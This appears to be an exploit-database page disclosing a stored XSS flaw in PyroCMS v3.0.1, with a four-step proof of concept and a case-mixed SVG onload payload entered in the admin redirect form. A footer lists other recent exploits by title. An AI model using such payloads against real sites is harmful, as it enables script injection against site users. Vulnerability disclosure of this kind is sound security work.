Pyrocms v3.0.1 stored xss Vulnerability / Exploit

  /     /     /  

Exploits / Vulnerability Discovered : 2024-05-13 | Type : webapps | Platform : php

[+] Code ...

# Exploit Title: PyroCMS v3.0.1 - Stored XSS
# Date: 2023-11-25
# Exploit Author: tmrswrr
# Category : Webapps
# Vendor Homepage: https://pyrocms.com/
# Version: v3.0.1
# Tested on: https://www.softaculous.com/apps/cms/PyroCMS



----------------------------------------------------------------------------------------------------


1-Login admin panel , go to this url : https://127.0.0.1/public/admin/redirects/edit/1
2-Write in Redirect From field your payload : <sVg/onLy=1 onLoaD=confirm(1)//
3-Save it and go to this url : https://127.0.0.1/public/admin/redirects
4-You will be see alert button

Pyrocms v3.0.1 stored xss


Last added Exploits Vulnerabilities

▸ soplanning 1.52.01 (simple online planning tool) - remote code execution (rce) (authenticated) ◂
Discovered: 2024-11-15
Type: webapps
Platform: php
▸ rengine 2.2.0 - command injection (authenticated) ◂
Discovered: 2024-10-01
Type: webapps
Platform: multiple
▸ opensis 9.1 - sqli (authenticated) ◂
Discovered: 2024-10-01
Type: webapps
Platform: php



Tags:
Pyrocms v3.0.1 stored xss Vulnerability / Exploit